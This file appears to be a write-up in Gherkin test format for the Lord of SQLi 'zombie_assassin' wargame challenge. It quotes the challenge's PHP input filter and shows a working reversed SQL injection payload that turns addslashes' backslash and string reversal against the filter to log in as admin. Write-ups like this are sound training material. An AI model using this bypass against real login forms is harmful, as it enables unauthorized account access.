## Version 2.0
## language: en

Feature: zombie-assasson-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | Windows         | 10 Pro              |
  | Firefox         | 74.0 (64-bit)       |

  Machine information:
    Given the challenge URL
    """
    .../chall/zombie_assassin_eac7521e07fe5f298301a44b61ffeec0.php
    """
    When I open the url with Firefox
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_zombie_assassin where id='' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    ZOMBIE_ASSASSIN Clear!
    """
    When I try with the well known payload:
    """
    ?id=' or '1'='1
    """
    Then I get nothing

   Scenario: Success:Sqli-comment-technique
    Given I inspect the code one more time
    And I see that they validate some strings to avoid union sqli
    And also validates quotes with addslashes
    And they reverse the string before the query
    """
    $_GET['id'] = strrev(addslashes($_GET['id']));
    $_GET['pw'] = strrev(addslashes($_GET['pw']));
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    if($result['id']) solve("zombie_assassin");
    """
    When I use a double quote, comment and a backslash to bypass the control
    And a well known payload
    And reverse my payload
    """
    ?id="&pw=+--1=1 ro+
    """
    Then I solve the challenge
